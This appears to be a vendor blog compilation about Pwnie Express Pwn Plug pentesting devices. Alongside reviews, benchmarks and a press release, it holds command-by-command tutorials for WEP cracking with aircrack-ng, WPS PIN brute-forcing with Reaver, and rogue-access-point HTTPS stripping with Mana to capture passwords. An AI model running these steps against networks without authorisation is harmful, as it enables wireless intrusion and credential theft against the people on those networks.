Pwn Plug R2 vs. R3 – Head to Head

The recently released Pwn Plug R3 is a departure from its predecessors in a number of ways, but perhaps none as pronounced as the move away from the low-power ARM architecture. Rather than stick to ARM, which is primarily used in smartphones and tablets, Pwnie Express has embraced the latest Intel Next Unit of Computing (NUC) architecture to bring desktop-like performance to the Pwn Plug line for the first time.

But what does that mean, in practical terms? Just how much faster is the new R3 compared to its most recent predecessor, the R2?

File I/O Performance

All of the Pwn Plugs use flash storage of some type, in the case of the R2 it’s a micro SD card, and on the R3 an Intel 525 Series SSD. The R3 obviously will have the advantage here, given that micro SD cards are designed to be nothing more than cheap mass storage, but by how much?

To get a very rough idea of sequential performance we can simply write a large file to the drive with the common Unix tool “dd”, which will report its write speed upon completion. The following command will write a 512 MB file filled with zeros, and report how fast it performed the operation:


time dd if=/dev/zero of=test bs=8k count=62500


The results of even this simple test are staggering:


The R2’s SD card can only manage a write speed of just over 12 megabytes per second, while the Intel SSD clocks in at an incredible 519 megabytes per second. There’s simply no contest, the R3’s storage technology is a generational leap above the R2.

Computational Performance

The R2 is powered by an Marvell Armada-370 processor clocked at 1.2 GHz, while the R3 has an Intel Celeron at 1.1 GHz. The casual observer may look at these numbers and think both processors would be around the same in terms of performance, since they are operating at the same clock speed. But with vastly different CPU architectures like this, clock speed is completely meaningless when it comes to performance.

To get a better idea of how these processors actually stack up, we can use a simple tool called “sysbench”, which is available in both the R2 and R3’s online package repositories. This tool will calculate prime numbers up to a user-defined value, putting continuous computational stress on the processor. The command to calculate 5000 prime numbers looks like this:


sysbench –test=cpu –cpu-max-prime=5000 run


The results, once again, are completely one-sided:


The R3 is able to calculate 5000 prime numbers over 10 times faster than the R2, showing the stark contrast between the computational capabilities of the ARM chip versus its similarly-clocked Intel counterpart.

Practical Benchmark

It’s surely clear that the R3 is a vastly more powerful machine than the R2, but some may make the case that the day-to-day usage of both devices are comparable enough that the raw power of each respective Plug is irrelevant.

To address that, let’s take a look at a valid real-world example. The infamous password cracker “John the Ripper” represents a practical demonstration of both raw computational power, and rapid file operations. It just so happens that John the Ripper even includes a built-in benchmarking facility for various encryption types which can be accessed like so:


john –test


The benchmark shows how many hashes per second John could perform against given encryption schemes on a particular piece of hardware. A higher number is better, as that means you can try more passwords in less time.




In truth, there’s hardly even a competition here. The R2 is completely outclassed by its successor. Both the simplistic benchmarks and the practical John test prove the same fact: the Pwn Plug R3 is a quantum leap forward in raw power, which directly equates to better performance in the field.


The Pony Grows Up: Pwn Plug R3 Review

The PowerBase

The Pony Grows Up: Pwn Plug R3 Review

November 11, 2014

By Tom Nardi

Over two years ago, we did a review for the first generation Pwn Plug; a little ARM box that looked enough like a power adapter for a printer that it could reasonably be hidden in a wiring closet or office, all the while snooping on the local network and reporting back to a remote operator. It was, in a word, revolutionary.

Not that the idea itself was actually new. People in the security industry had been talking about this kind of thing for years, and of course, anyone who’s ever seen a spy movie can probably envision a device that operates in a similar manner. But it had never been practical to put into the field with the bulky x86 systems that ruled computing. Once Linux on ARM became mainstream though, it didn’t take the outside the box thinkers of Pwnie Express long to create a security appliance right out of a James Bond movie.

But technology changes rapidly. An ARM computer you plugged into the wall and ran Linux on that cost “only” a few hundred dollars was an incredible feat in 2012, indeed, it was enough to build a whole new industry on. Now we have Raspberry Pi’s running off of 9V batteries for $35 at Radio Shack.

Can a Pwn Plug in 2014 make the same kind of waves the original did in 2012? Or has the industry, and technology, past the concept by?

The Pwn Plug Line

For the uninitiated, the Pwn Plug line is advertised as the premiere turn-key penetration testing device on the market. With the ability to establish a reverse shell both in and out of band (I.E. through the host network, or over cellular), the Pwn Plugs are an extremely easy way to get a back door into whatever network they happen to be connected to. With their small size and unobtrusive physical appearance, the Pwn Plugs are ideal for covert deployments and performing remote penetration tests without having to physically travel to the target.

Once the Pwn Plug has dialed home, the operator has access not only to the dizzying array of open source security tools which the Pwn Plug includes, but can use the included development environment to compile, or even develop, new software right from within the target network.

None of these individual features are particularly revolutionary taken on their own, but combining them all into one ready to go appliance is. The Pwn Plug isn’t so much about breaking totally new ground as combining methods and technologies into a cohesive product that saves the user the trouble of putting it all together themselves.

The hardware is off the shelf, and the software is (mainly) open source. What you pay for isn’t the product itself, but the combined knowledge and support of the Pwnie Express team.


Ironically enough, for this latest version the Pwn Plug has switched back to the x86 platform that had hindered this sort of product for so long in the past. Instead of a comparatively anemic ARM device, the R3 is based on the Intel Next Unit of Computing (NUC). Sporting a 64 bit dual core 1.1 GHz CPU and 2 GB of RAM, the R3 could double as a small form factor desktop in a pinch.

While the performance boost is certainly welcome, arguably the biggest improvement of the R3 is the fact that it now features built-in wireless (WiFi and Bluetooth) hardware. The original Pwn Plug relied on external adapters for wireless support, which was…ungainly, to say the least. The R2 had built-in WiFi, but still required an external Bluetooth adapter. With the R3, both are now supported out of the box without having to plug anything in. Though some may take issue to the fact that the integrated wireless solution on the R3 precludes the use of external antennas, the reality is, most use cases will work fine with the built-in radios.

On the flip side, while the R3 finally integrates wireless, it loses the second Ethernet port that the R2 added. This is something of a step backwards as it means you’ll now need to use an external Ethernet adapter to perform certain tasks, just like on the original Pwn Plug. Realistically, most users are probably more interested in wireless anymore, so losing the dual Ethernet in favor of built-in wireless is unlikely to ruffle many feathers, but it was nice to have the option.


Hardware wise, there is no question that the R3 is easily the most powerful of the Pwn Plugs, and the internal wireless (lack of dual Ethernet notwithstanding) finally fixes one of the most glaring problems of its predecessors. Unfortunately there is one thing the R3 lacks which the earlier Plugs had in spades: the element of surprise.

Pulling the Plug

Without a doubt, one of the most revolutionary things about the original Pwn Plug was that it didn’t look anything like a traditional computer; it was a white box that plugged into the wall. It even came with stickers that made it look like a power adapter or an automatic air freshener. It was sort of the whole point, you could plug it into the wall and there was very little chance that anyone but the most astute would have thought something was out of the ordinary.

The R2 was not quite as stealthy as the original Plug, but thanks to its general shape and large external antenna, it could plausibly take on the appearance of an innocent wireless access point. It might have gotten more attention than the original Plug, but at least it wasn’t completely out of place.

But sadly the R3 doesn’t have either form of camouflage; it has the dubious honor of simultaneously looking in and out of place. On one hand, it doesn’t have the non-traditional shape of the original Plug, and on the other, it doesn’t look nearly as utilitarian as it should if it’s going with the R2’s plausible deniability defense.

With its sleek lines, front mounted USB port, and blinking LED activity light, the R3 looks more like a Roku than a penetration testing device. The thing’s even got HDMI (dual HDMI, at that).


Which makes the R3 sort of an odd addition to the Pwn Plug line. Is it still trying to be a covert device? Have Pwnie Express abandoned that line of logic in favor for simply delivering a turn-key penetration testing device? The documentation refers to the hardware as “portable” and “shippable”, but no longer calls the device a “drop-box” as in earlier Pwn Plug revisions.

Of course, it makes sense. The idea of attempting to hide an expensive piece of hardware in your target network was always a bit hokey. Certainly clever, but not terribly practical over the long term. But the idea of a small and portable IT penetration device with reverse shell capability isn’t only useful in the context of hiding it; you can just as easily ship it to a target and have them plug it into their network.

Remember, the use case for the Pwnie products is legitimate penetration testing, not breaking into networks illegally. Rather than having to send out an investigator every time a company or organization conducts a penetration test, they can simply ship a Pwn Plug to the target and have them hook it up to the network. The penetration test can then be done remotely, faster and cheaper than it could have been done otherwise.

Losing the pretext of the Pwn Plug being a covert hacking device is a bit of a let down on the surface, but realistically, it’s just a sign of Pwnie Express taking its products down a more mature and corporate-friendly direction. There are certain circles where a little box that looks like an air freshener just isn’t going to be taken seriously as a legitimate tool, and for those places, the R3 becomes a necessity.


On the software side, Pwnie Express has taken the world’s most popular security testing Linux distribution, Kali, and customized it to create Pwnix. Because it’s running on a Kali base, Pwnix includes essentially every worthwhile open source security tool in existence, and is constantly being revised with new tools and updates. Even if there’s a tool you want that isn’t included, thanks to Pwnix including a full fledged Linux environment and the R3 running on standard Intel x86 hardware, you can almost certainly install it without jumping through too many hoops.

Pwnix also includes a very slick web based user interface for configuring and updating the R3, as well as launching services and setting up reverse SSH shells.


The web UI is a very nice touch that really makes the Pwn Plug feel like a professional and cohesive product. It beats having to dive into the command line every time you want to clear some logs or change an IP address.

Missed Opportunities

In general the software environment is quite good, but there are a few obvious areas of improvement.

For example, for all the polish that has been put into the web UI, it seems like it would be utilized a bit better. The web UI only lets you start a paltry 3 services, and you can’t even do something as simple as a WiFi site survey with it. Even consumer grade routers let you scan for other APs from within their UI’s anymore.


Of course, given the immense amount of services and functions that the user could potentially want to access on their R3, it would be unreasonable to assume there could be a UI front-end for each one of them. Still, there are a few key services and functions that Pwn Plug operators would almost certainly use which could get a proper UI treatment.

As it stands, the web UI is something you would only visit on occasion. This seems an aweful waste of potential, and hopefully something Pwnie will address with future software updates.


All in all, the Pwn Plug remains a remarkably complete turn-key penetration testing solution. The new hardware is not only more powerful than the previous versions of the hardware (as should be expected), but has an air of professionalism that its predecessors lacked. While it might not be the same type of “cowboy” style product the original Pwn Plug was, it certainly fills a niche and continues to push the Pwn Plug forward.

That said, it still isn’t perfect. While this version of the Pwn Plug still requires less external devices than the original to operate to its full potential, having to plug in external GSM or Ethernet adapters is rather awkward. As with the previous Pwn Plugs, the off the shelf hardware that Pwnie Express chooses to use is adequate, but not always ideal. Given their success, it would be nice to see Pwnie Express invest in more custom-made devices rather than relying on hardware that’s already commercially available. They’ve done it in the past with the Power Pwn, but seems reluctant to try again.

But in the end, outside of the little nagging issues, there’s really not much to dislike about the R3. Previous Pwnie products have had something of an unfinished feel, or perhaps to put it a different way; previous Pwnie devices gave the impression they were still being actively developed and experimented with, even after you purchased them. But with the R3, the hardware and software has really come together into a product that feels complete.

With the R3 you get the distinct impression that not only has the product itself reached a new level of maturity, but so has the company behind it.

The Pwn Plug R3 is available now, directly from Pwnie Express for $995, with optional extended warranty service and web-based training.

(Original Article)

Shadow IT in Stores and Branches: How to Stay Compliant

InfoSecurity Magazine

Shadow IT in Stores and Branches: How to Stay Compliant

October 22, 2014

By Bob Tarzey

Branches are where the rubber still hits the road for many organisations; where retailers still do most of their selling, where much banking is still carried out and where health care is often dispensed. However, for IT managers, branches are outliers, where rogue activity is hard to curb; this means branches can become security and compliance black spots.

Branch employees may see fit to make their lives easier by informally adding to the local IT infrastructure, for example installing wireless access points purchased from the computer store next door. Whilst such activity could also happen at HQ, controls are likely to be more rigorous. What is needed is an ability to extend such controls to branches, monitoring network activity, scanning for security issues and detecting non-compliant activity before it has an impact.

A proposition from Boston, USA-based vendor Pwnie Express should improve branch network and security visibility. Founded in 2010, Pwnie Express has so far received $5.1 million Series-A venture capital financing from Fairhaven Capital and the Vermont Seed Capital Fund. The name is a play on both Pony Express, the 19th century US mail system and the Pwnie Awards, a competition run each year at the Black Hat conference to recognise the best discoverers of exploitable software bugs.


(Original Article)

Bypassing HSTS SSL with the Mana Toolkit

Anyone who’s attempted to use Moxie Marlinspike’s SSLstrip against recent browsers has no doubt run into HTTP Strict Transport Security (HSTS), a mechanism by which a website is able to inform the browser if it’s supposed to be secured with SSL. This fixes the key problem with previous SSL implementations (and what made SSLstrip possible); the fact that the user had to know ahead of time if the site they were visiting was using encryption.

When a user running a recent version of Chrome or Firefox visits an SSL secured site which has been forced down to plain HTTP with SSLstrip, it not only fails, but goes as far as informing the user their current Internet connection is potentially being tampered with by a third party.

But thanks to the recently released “Mana Toolkit”, the SSLstrip technique is once again viable on modern operating systems and browsers. Combining an updated version of SSLstrip, some DNS trickery, and a turn-key rogue AP, Mana is an extremely effective solution for covertly capturing WiFi traffic.


Running Mana

Mana has just recently been added to the Kali Linux repositories, which means it’s automatically available to Pwnie devices running Pwnix by simply running:


apt-get install mana-toolkit


This will pull in quite a few dependencies required to get Mana running, and will drop you back to the command line once finished.

From there, navigate to the Mana directory located at /usr/share/mana-toolkit, and then enter the directory named run-mana. Here you’ll find a number of scripts used to control how Mana operates.



Of the available scripts, the following will be the most useful under normal circumstances:

Starts the rogue AP, routes client requests to the Ethernet network, and enables all of the tools included in Mana will. This is the script you want to get Mana working as quickly as possible.

Starts the rogue AP, but none of the tools. Use this script if you want to deploy your own tools against targets.

Starts roque AP without Internet connection, complete with fake captive portal login for attempting to capture victim credentials even if you’re offline.

The most common usage will be to run the full Mana suite, so we’ll look at that. While you can manually edit the configuration files under /etc/mana-toolkit, it isn’t necessary to get Mana up and running. Running the “” script will launch Mana and start flooding the terminal with status info:



Mana will now be advertising a wireless network named “Internet”, as well as attempting to spoof other networks as it sees SSID broadcasts from clients searching for previously connected access points.


Compatible Sites

Mana includes the necessary configuration files to capture credentials on a number of popular sites, but of course not all are currently supported. Browsing the source via their official GitHub page shows Mana is already setup to capture login credentials from Facebook, Google, and Apple:

As Mana is still in development, additional sites and services are still being added. In the meantime, the developers suggest using the already available code as a template to customize your Mana installation for your specific needs and targets.


Reviewing Captured Data

The main Mana script dumps out a rather overwhelming amount of continually updating information, and it can be very difficult to interpret it as everything goes by. It’s therefore easier to manually check the SSLstrip logs to look for captured credentials than trying to read them from the script’s output.

The main SSLstrip log file is located at /var/lib/mana-toolkit/sslstrip.log, which holds all the previously SSL protected data that Mana managed to capture. Searching this file for usernames and passwords (try using grep to search for terms such as “pass”) can uncover some extremely interesting information.

New Call-to-action

WPS Cracking with Reaver

We’ve previously covered how ineffectual WEP encryption is for securing a wireless network, showing that the Pwn Plug R3 can easily break into a WEP network in less than one minute. But considering how old WEP is, that shouldn’t really come as much of a surprise. Most networks will now be running the much more robust WiFi Protected Access (WPA), with WEP running mainly on the older systems that haven’t been updated or maintained.

But while it’s not as trivial as breaking into a WEP network, WPA is not completely infallible. Here we will take a look at one of the methods used to crack into a WPA network, and some of the pitfalls you may encounter.


WPS Pin Attack

An often overlooked feature on many WiFi routers and access points is WiFi Protected Setup (WPS). This is a convenient feature that allows the user to configure a client device against a wireless network by simultaneously pressing a button on both the access point and the client device (the client side “button” is often in software) at the same time. The devices trade information, and then set up a secure WPA link.

On the surface, this is a very clever feature. It allows less savvy users to establish a secure connection between their devices quickly and easily, and as it requires physical access to the hardware, it would seem relatively secure.

But a tool called Reaver has been designed to brute-force the WPA handshaking process remotely, even if the physical button hasn’t been pressed on the access point.

While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.

Note: To be clear, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which they should, given the existence of tools such as this), it will be immune to the following attack.


Finding a Network

If you’ve read the previous tutorial on cracking into a WEP network, you’ll recognize the command used to get the hardware into monitor mode:


airmon-ng start wlan0


From here you could use airodump-ng to look for networks, but Reaver actually includes its own tool for finding vulnerable WPS implementations which is much more straightforward. To start it, run the following command:


wash -i mon0


The output will look something like this:

WPS Cracking

This shows two networks which are, at least in theory, vulnerable to the WPS brute force attack Reaver uses. Note the “WPS Locked” column; this is far from a definitive indicator, but in general, you’ll find that APs which are listed as unlocked are much more likely to be susceptible to brute forcing. You can still attempt to launch an attack against a network which is WPS locked, but the chances of success aren’t very good.


Launching Reaver

Once you’ve found a network you wish to run the attack against, operating Reaver is very straightforward. The basic command needs only the local interface, channel, and ESSID to be specified. The command to launch Reaver against the “linksys” network above would look like this:


reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv


The only part of the above command that might not be immediately obvious is “-vv”; this enables verbose output which greatly helps when trying to gauge how well Reaper is (or is not) progressing.

Once you’ve started Reaver, you’ll start seeing output like this:


This output shows that WPS pins are successfully being tried against the target (here we see 12345670 and 00005678 are being tested), and Reaver is operating normally.


Advanced Options

Ideally, the basic command works and the attack progresses as expected. But in reality, different manufacturers have been trying to implement protections against Reaver-style attacks, and additional options may be required to get the attack moving.

As an example, the following command adds a few optional switches that can help to get Reaver working on more picky devices:


reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15


The core command hasn’t changed, the additional switches just change how Reaver behaves:


Ignore locked WPS state.


Don’t send NACK packets when errors are detected.

-d 15

Delay 15 seconds between PIN attempts.


Set timeout period to half a second.

-r 3:15

After 3 attempts, sleep for 15 seconds


This is by no means an exhaustive list of Reaver options, but it gives an idea on what kind of things you might want to try.


Attack Duration

Even under ideal conditions, Reaver can take a very long time to complete its run. There is an element of chance involved, the brute forcing could theoretically discover the PIN very quickly, but in general it is going to take many hours to even make a dent in the possible pool of PINs.

Luckily, Reaver keeps a progress log file automatically, so you can stop the attack at any time and resume whenever it’s convenient. Spending a few hours a day running Reaver against the same network should uncover its PIN and through that the WPA passphrase…eventually.

Learn More About Rogue Devices

WTF: The Internet of Things?

– By Mark Davis –

Many of us are still getting used to the idea of being connected to the internet through our smartphones. But just as we’re coming to accept that it may be impossible to ever truly get away from the web, a bizarre new term seems to suggest even more ways to be plugged in.

The “internet of things.”

WTF is that?

It boils down to a future in which internet connections will be built into tiny devices in all manner of products — refrigerators, light bulbs, industrial equipment — allowing them to speak to each other without human control. Apps would monitor them.

Two key advancements — the spread of wireless technology and the advent of the cloud, where massive quantities of data can be stored and accessed with ease — have ushered in the era of IoT.

In fact, it’s already upon us: Today, you can buy a so-called smart refrigerator that, with the help of tiny sensors, will tell you when you’re low on milk or eggs. The local sporting goods store sells plenty of wearable fitness devices that measure heart rate, pace, the running-route topography and just about anything else you can think of, and uploads the info to the cloud. Smart meters, which control energy use in your home and communicate back to the utility for billing and monitoring purposes, are growing in popularity.

Wait, there’s more.

Waterbury-based Keurig Green Mountain has hinted at a future in which its ubiquitous coffee machines may be connected to the internet. The bottom of the recently released Keurig 2.0 has a dataport for unspecified future uses.

The next generation of smart refrigerators won’t just tell you what to put on your shopping list. They’ll share that information with the grocery store, and as you pull into the store’s sensor-filled parking lot, clerks will have gathered the goods for you.

At least, that’s the future envisioned by South Burlington-based Logic Supply, which has been in the IoT game since before the term was coined.

While IoT consumer goods get most of the media attention, Logic Supply is focused on industrial applications.

For example, to help a mining company improve efficiency and keep better track of its inventory, Logic Supply installed computers in the mining carts, sensors on their tracks and a computer to upload all the information gleaned from those gizmos into the cloud, where it can be accessed in real time.

While most of its business is national and international, Logic Supply has worked with some Vermont companies, including Pwnie Express, which provides security products to governments and private companies.

“I think you’re going to continue to see more and more commercial applications for systems and devices that are speaking to each other, reacting to what others are doing,” Logic Supply content manager Darek Fanton predicted. “I don’t see the downside. It’s nothing but helpful. It creates efficiencies.”

Last year, Cisco Systems issued a report that claimed 8.7 billion devices were connected to the internet in 2012 — and the networking equipment manufacturer predicted the number would explode to 50 billion by 2020. The financial firm Morgan Stanley countered with its own prediction: 75 billion.

The McKinsey Global Institute lists the IoT as a “disruptive technology” with an worldwide “economic impact” that could reach $6.2 trillion by 2025.

The founders of MicroGen Systems hope to secure a piece of that pie. UVM alum Robert Andosca and professor Junru Wu created the company in 2007, basing it on research they did at UVM. MicroGen Systems makes miniscule wireless devices that “scavenge” energy from vibrations, and use it to power tiny sensors, according to the university. The company is now based in Rochester, N.Y.

“The internet of things is pretty much a lot of sensors on all things, and all they’re doing is detecting something, whether it’s vibration, heat, humidity, some parameter or multiple parameters,” Andosca said. “And all that data is transmitted to a hub, a computer, and gets uploaded on the internet, so now the whole world is connected and becomes smarter. It’s really an amazing time we live in.”

Of course, you might wonder, Haven’t I seen all this before? Isn’t this the point in the sci-fi movie where the machines realize they no longer need humans, so they take all the power we have given to them and use it to exterminate us?

Rest easy, IoT advocates say. The interconnected machines still need human input, and can only act within parameters we set.

“There’s a fine line between something being a very popular buzzword, and something being terrifying,” Fanton of Logic Supply said. “An intelligent machine is different than a machine that is thinking for itself. An intelligent machine, you give it parameters. It can react to what’s happening, but it’s not sentient. It’s not making those decisions without some input from you at some point.”

Well, that certainly sounds reassuring. If one day you wind up battling some homicidal machine-robot, at least there’s someone local to blame.

Shadow IT in Stores and Branches: How to Stay Compliant

– By Bob Tarzey –

Branches are where the rubber still hits the road for many organisations; where retailers still do most of their selling, where much banking is still carried out and where health care is often dispensed. However, for IT managers, branches are outliers, where rogue activity is hard to curb; this means branches can become security and compliance black spots.

Branch employees may see fit to make their lives easier by informally adding to the local IT infrastructure, for example installing wireless access points purchased from the computer store next door. Whilst such activity could also happen at HQ, controls are likely to be more rigorous. What is needed is an ability to extend such controls to branches, monitoring network activity, scanning for security issues and detecting non-compliant activity before it has an impact.

(Original Article)

Pwnie Express’s “Pwn Pulse” SaaS Security Assessment Solution Gets Top Scores in Rigorous Security Audit

TrustedSec Tests First-of-Its-Kind Enterprise Remote Location Intelligence Platform

Boston, MA, October 21, 2014 – Pwnie Express today announced that its new Pwn Pulse software as a service (SaaS) solution scored top marks in a comprehensive security audit performed by leading security-consulting firm TrustedSec, LLC. An end-to-end security assessment solution designed specifically for hard-to-reach distributed remote sites, Pwn Pulse delivers real-time wired and wireless asset discovery, continuous vulnerability scanning, pentesting, risk trending and alerting.  The enterprise-class offering uses Pwnie Express’s easy-to-deploy sensors combined with central management to provide highly scalable continuous intelligence across remote locations. “We were very impressed with how Pwn Pulse compared to the security of most other SaaS platforms,” said Dave Kennedy, President and CEO of TrustedSec. “Pwnie Express is clearly paving the way to a new baseline security profile for SaaS.” Enterprises across verticals have lauded Pwnie Express’s new Pwn Pulse software as a service (SaaS) solution, calling it “groundbreaking”  for its ability to easily provide visibility across their remote locations. “Pwn Pulse allows us to have true policies in regards to our networks and computers and a true way to test them,” said Eric Gilbert, Manager of IT Operations for Black, Mann & Gramm, L.L.P, who took part in the Beta program. “It gives us the ability to not only have the policies on hardening our hardware but also a way to verify that it’s where it’s supposed to be.” Pwnie Express CTO and Founder Dave Porcello welcomed the TrustedSec audit, remarking:  “We are thrilled that Pwn Pulse performed so well after being pummeled by some of the top web application security pentesters in the industry. The fact that we scored so impressively with zero critical or high priority vulnerabilities validates our commitment to delivering a best-of-breed differentiated remote security assessment solution.” Pwnie Express’s new SaaS solution completes the entire enterprise security assessment lifecycle. The solution delivers a robust centralized management console. It also easily and seamlessly integrates with existing security information and event management (SIEM) products. Product benefits include:

o   Provides a cost-effective lightweight, non-intrusive and easy-to-deploy solution for remote locations

o   Delivers the most comprehensive asset discovery to remote sites

o   Extends vulnerability management to remote sites

o   Enables subsequent on-demand penetration testing to remote sites

o   Allows for easy anywhere multi-site deployment

o   Increases frequency and scope of remote site assessment

o   Expands awareness of wired, wireless, BYOD and rogue devices across all sites

o   Addresses PCI DSS and HIPAA compliance requirements at remote sites

o   Reduces travel and operational overhead required to do security testing

Availability: Pwn Pulse is  generally available. For more information please contact: (855) 793 – 1337


[Press Release]

(Fast) WEP Cracking on the Pwn Plug R3

It’s common knowledge that Wired Equivalent Privacy (WEP) is a completely broken form of WiFi security, but not everyone knows just how trivial it can be to defeat with a properly configured appliance such as the Pwn Plug R3. Not only is the R3 ready to go with the latest versions of all the required software, it’s also equipped with a high performance injection-capable wireless chipset and enough processing power to easily crunch the target network’s key.

Finding a Target

To start, we’ll put the R3’s internal WiFi radio into monitor mode, and see what networks are operating in the area. Running the following commands will setup the hardware and show a list of networks and their pertinent information:

airmon-ng start wlan0

airmon-ng mon0

You’ll be presented with a screen that will look something like this:

WEP Cracking

Here we can see we have a perfect target, a network named “linksys” on channel 6 which is running WEP encryption and has a nice strong signal.

Capturing Data

The next step is to use airodump-ng to capture data from the network, which we’ll eventually use to crack the WEP key. Simply plug in the values discovered from airmon-ng into airodump-ng:

airodump-ng -c <CHANNEL> -w <LOGFILE> –bssid <AP MAC> mon0

So the command to start dumping data from our “linksys” network would be:

airodump-ng -c 6 -w linksys –bssid 00:23:69:48:33:95 mon0

The resulting display will show clients connected to the network, as well as how much data is actually moving through the air:


Not much is happening on this network right now, but using packet injection, we’ll soon change that.

Note: Keep airodump-ng running in the background while performing the next steps.

Packet Injection

Circumventing WEP requires a large amount of encrypted data to be captured from the network so there’s enough information to crack the key. Under normal circumstances this would mean an attacker would need to wait around and capture data as it’s sent out by the network in the course of normal operation. The key to cracking WEP quickly is using packet injection to force the network to send more data out than it would normally.

The first step is to associate the R3 with the target network, which can be done with the following command:

aireplay-ng -1 0 -a 00:23:69:48:33:95 mon0

Which will give you the following output:



This command will throw up a few lines, but the only important one you need to look for is the final one. If you get a little smiley face, you’re good to go.

Finally, we’ll use another aireplay-ng command to start flooding the network with data, which will be captured by airodump-ng that we’ve been running in the background from earlier.

aireplay-ng -3 -b 00:23:69:48:33:95 mon0

Keep an eye on the last line of aireplay-ng’s output to see the the attack progressing.


Cracking the Key

With data pouring into the Pwn Plug, there’s only one thing left: use aircrack-ng against the growing capture file to crack the WEP key. By running aircrack-ng against the capture file as it’s being filled by airodump-ng, the process will continue until the necessary amount of data is collected (which varies from network to network).

Simply give aircrack-ng the name of the log file you specified when running airodump-ng:

aircrack-ng linksys-01.cap

A few seconds later, you should see the cracked WEP key ready for use


In practice, it will probably take longer to read the steps involved in cracking WEP than it does to actually recover the key. With the processing power and WiFi chipset in the Pwn Plug R3, going from target acquisition to recovered key can be done within a minute.


Standard Reverse SSH

Next in our how-to Pwnie is a tutorial in how to set up a standard reverse SSH connection. In order to get past firewalls and communicate directly with a Pwn Pro sensor located in a remote location, a reverse SSH connection must be set up. This demonstration will be using a Pwn Pro, though any Pwn Appliance or Pwn Plug will work. The video guides you through specifying the Kali Linux connection and setting up various types of reverse shells (standard, reverse over DHS, etc). All you need to do is supply a DNS resolvable name and a port number. The guide then continues to describe the different types of SSH and which may be most useful for your use case. The tutorial also explains how you can add a second SSH receiver. And be sure to watch the video! A contest featuring this video will be going up on our weekly promotions page soon.